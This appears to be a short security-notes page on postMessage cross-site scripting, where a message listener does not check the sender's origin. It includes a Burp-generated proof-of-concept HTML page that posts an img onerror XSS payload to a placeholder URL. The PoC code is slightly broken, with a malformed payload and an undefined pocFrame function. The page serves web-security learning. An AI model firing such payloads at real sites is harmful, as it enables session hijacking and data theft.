Post Message Xss

Post message xss

specifically in the event listener of postMessage requests that do not check the origin before accessing data. As a result, an attacker can exploit this vulnerability by sending malicious data to your application from a null (sandboxed iframe) and pretending that it came from a trusted source. This could lead to a number of security risks such as data theft or other malicious activities.

Proof of Concept (PoC)

<!doctype html>
<html>
    <head>
        <!-- DOM XSS PoC - generated by DOM Invader part of Burp Suite -->
        <meta charset="UTF-8" />
        <title>Postmessage PoC</title>
        <script>
            function pocLink() {
                var ref  = window.open('https://url');
               ref.postMessage("<img src=x onerror=alert('pwnwed'>","https://url");
                }
               
           
         
        </script>
    </head>
    <body>
        <a href="#" onclick="pocLink();">PoC link</a>          
        <iframe src="https://url" onload="pocFrame(this.contentWindow)"></iframe>                    
    </body>
</html>

PreviousAutomated XSS NextXXE Methods

Last updated 4 months ago